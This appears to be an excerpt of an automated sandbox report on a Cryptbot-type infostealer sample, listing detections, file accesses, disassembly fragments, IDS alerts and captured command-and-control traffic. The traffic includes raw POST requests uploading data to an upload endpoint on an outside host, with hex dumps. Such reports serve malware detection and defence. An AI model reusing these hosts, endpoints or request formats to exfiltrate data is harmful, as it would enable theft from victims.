Source: 0HUxKfIvSV.exe |
ReversingLabs: Detection: 31% |
Source: Submited Sample |
Integrated Neural Analysis Model: Matched 100.0% probability |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 8_2_006615B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
8_2_006615B0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 8_2_6C2414B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
8_2_6C2414B0 |
Source: 0HUxKfIvSV.exe, 00000000.00000000.1671044915.000000000133E000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: -----BEGIN PUBLIC KEY----- |
memstr_a3662eed-3 |
Source: 0HUxKfIvSV.exe |
Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED |
Source: 0HUxKfIvSV.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT |
Source: C:\Users\user\Desktop\0HUxKfIvSV.exe |
File opened: C:\Users\user |
Jump to behavior |
Source: C:\Users\user\Desktop\0HUxKfIvSV.exe |
File opened: C:\Users\user\Documents\desktop.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\0HUxKfIvSV.exe |
File opened: C:\Users\user\AppData |
Jump to behavior |
Source: C:\Users\user\Desktop\0HUxKfIvSV.exe |
File opened: C:\Users\user\AppData\Local\Temp |
Jump to behavior |
Source: C:\Users\user\Desktop\0HUxKfIvSV.exe |
File opened: C:\Users\user\Desktop\desktop.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\0HUxKfIvSV.exe |
File opened: C:\Users\user\AppData\Local |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea ecx, dword ptr [esp+04h] |
8_2_006681E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C2BAEC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C2BAF70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C2BAF70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C260860 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
8_2_6C26A970 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C26A9E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
8_2_6C26A9E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6C31F960h |
8_2_6C25EB10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C264453 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
8_2_6C2E84A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
8_2_6C26C510 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
8_2_6C26A580 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C26A5F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
8_2_6C26A5F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C26E6E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
8_2_6C26E6E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, ecx |
8_2_6C2E0730 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
8_2_6C260740 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C2BC040 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C2BC1A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+04h] |
8_2_6C29A1E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
8_2_6C260260 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [6C31D014h] |
8_2_6C314360 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C2BBD10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C2B7D10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
8_2_6C2B3840 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+04h] |
8_2_6C26D974 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
8_2_6C299B60 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
8_2_6C27BBD7 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
8_2_6C27BBDB |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C2BB4D0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
8_2_6C26D504 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [esp+04h] |
8_2_6C2B9600 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] |
8_2_6C26D674 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6C31DFF4h |
8_2_6C2B3690 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+08h] |
8_2_6C26D7F4 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
8_2_6C2E3140 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C25B1D0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C26D2A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
8_2_6C2D7350 |
Source: chrome.exe |
Memory has grown: Private usage: 12MB later: 25MB |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49737 -> 46.173.214.92:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49738 -> 46.173.214.92:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:58641 -> 46.173.214.92:80 |
Source: global traffic |
HTTP traffic detected: GET /xaDSPDgkqKmDlPNoQLbs1730201416 HTTP/1.1Host: home.thirtjo13vt.topAccept: */* |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: thirtjo13vt.topAccept: */*Content-Length: 460Content-Type: multipart/form-data; boundary=------------------------oZrwnmiYQDa2dgjEQs6JOCData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6f 5a 72 77 6e 6d 69 59 51 44 61 32 64 67 6a 45 51 73 36 4a 4f 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 75 71 65 66 65 62 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a f9 2c dc d7 f8 35 3c d8 80 dd 3a 71 c4 71 90 d8 3f 7e 43 55 04 b0 17 e6 65 19 38 f0 0b 5d 9b 12 f3 2f 58 6b 10 34 1e 53 e8 47 17 41 2b dd 57 8a 56 42 8d f4 a4 c9 db a3 6a de d4 82 9a 9c a1 80 d9 b7 55 6f 52 8d 3d 77 82 11 02 f7 05 dc b1 12 59 43 c1 55 05 af 04 00 8c cf 4b 5c 83 00 a2 2e 8e f3 ce b0 9e ab bf 1a ce e2 98 c6 9e 21 12 6e 5a 44 c3 00 b8 87 ee fb a9 1d e2 08 2c 51 55 ed c5 c5 77 0f 06 8f 7a 02 9c f0 45 d1 e5 8c ea d5 ad c2 36 ba 0e 9b 9f b4 a2 28 bb 11 d6 ba 56 5f ed d4 15 32 f9 d1 01 b6 69 cd 60 f9 3e 10 8f e5 9b 83 45 1f cc b0 f2 43 c4 6c de 0f 5c 99 2e 08 4d 6c 74 15 e0 53 40 bc 9d 5b a0 1a 7e 04 6b 88 ab 37 d7 45 6b d5 4e 84 25 aa 65 c5 36 e7 77 a4 f8 2b a7 52 31 c6 f1 31 cf ab aa 19 ae 3c ec 0f 40 cf 73 e8 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6f 5a 72 77 6e 6d 69 59 51 44 61 32 64 67 6a 45 51 73 36 4a 4f 43 2d 2d 0d 0a Data Ascii: --------------------------oZrwnmiYQDa2dgjEQs6JOCContent-Disposition: form-data; name="file"; filename="Kuqefeba.bin"Content-Type: application/octet-stream,5<:qq?~CUe8]/Xk4SGA+WVBjUoR=wYCUK\.!nZD,QUwzE6(V_2i`>ECl\.MltS@[~k7EkN%e6w+R11<@s--------------------------oZrwnmiYQDa2dgjEQs6JOC-- |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: thirtjo13vt.topAccept: */*Content-Length: 89794Content-Type: multipart/form-data; boundary=------------------------SH2Y8opxqBLFCZvfGnlYf7Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 53 48 32 59 38 6f 70 78 71 42 4c 46 43 5a 76 66 47 6e 6c 59 66 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6f 73 75 79 65 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 8c ca fa 81 d6 8a 31 0b e9 cf 87 8e 18 88 86 d6 4c 07 44 40 f4 39 74 24 27 21 15 4b a6 12 2d 1a ae 52 74 34 7b 42 b3 bc 57 e9 64 27 46 46 db 44 7c 06 87 8d 18 07 1b 35 2b d6 63 80 54 c1 19 bc 1a a9 f1 12 db 7b 8a 03 2e e3 42 8a 0f 01 2b a6 53 ca d8 33 3a 13 3c b5 68 e1 63 d6 c6 2a 1c ba e2 6b f1 de 22 63 cd 5e f3 8e 18 24 49 02 fa 2a 2e de 43 cc 28 e5 0a 65 58 a8 ae 29 19 2c 73 74 12 f6 ac 0b b2 63 5c d1 96 51 df b0 af d3 06 a4 d6 ca c9 f2 8e cd de 60 c6 33 c4 0b 27 eb 66 92 22 88 5e cd c0 15 73 37 ad c3 25 d5 b2 49 bf 7b 1f 51 e5 bd 46 5d 61 cc eb a6 12 30 85 5d 63 b2 57 3b 81 55 77 4c 9d 4c e9 9d 0a e7 41 32 33 7a f3 49 e0 dd 0b e4 a5 b2 45 5f 33 25 2a 50 ac 12 60 df 1a 7d c2 83 43 fe e5 a3 e7 72 c2 0c 24 15 b8 7f b2 0f 08 1a 80 34 2d 69 f4 87 d8 c0 35 2b e7 6b d6 0a 2a 8b 4c 85 1c 7c 64 5d cb 31 36 53 61 0a 85 53 e9 71 6f 0c 85 a4 dd 30 f6 5a 8c 96 84 63 a9 0b bc 06 a7 64 65 0c 08 29 3a 8b 0f ef dd e9 83 83 ff 8a e1 ec 59 d7 42 7a 1d f7 c1 ee 43 7b b1 14 57 4c 3e 9a 4f 2e 9e 08 13 14 1e 78 96 4e 08 01 18 61 a4 63 e9 51 63 4a f8 ba d6 17 2e ac 29 f0 d4 fc 62 7a 49 b4 04 84 86 3d ba b7 66 bb a9 43 cd 2e 4b f9 57 b0 93 0d 9c 41 38 be 4a 97 41 b1 0e 7a 54 01 90 cd 58 94 7c f2 da bb 51 fa ef cc 0f 30 28 e7 cf 54 64 48 68 ab 11 4d ac d5 6c 2e 92 59 23 a7 3c 0c 8a 74 d8 b8 a1 ef 27 2d 0f 30 86 5a e2 16 8e f3 51 48 9a d2 6b ee 38 32 61 5f 59 f2 d1 26 af d9 b6 d4 48 5b 60 5e 8c 19 33 1b 5a fb cb 97 0f fc 0e 3a 52 0a e1 f8 9c b2 eb 01 b0 4c 8e b9 01 16 26 03 2f f2 29 a0 79 50 d3 83 04 00 e6 26 9d 76 f6 57 25 ca 8e 6b 82 80 f3 a4 f5 09 df 54 7f b0 7a e1 d6 ad 00 1f 1a d7 27 08 6c c2 86 73 f3 4d 05 b7 7a b3 40 00 15 9e 70 8d 9b 7c 21 d4 93 54 a3 fd 91 02 77 4f 33 74 1e 7a 25 58 6c b4 a3 99 0b c7 b8 7b 90 9b 70 45 4a 48 22 e8 62 73 9e 17 71 0b 0b 45 04 19 26 4b 96 4f d |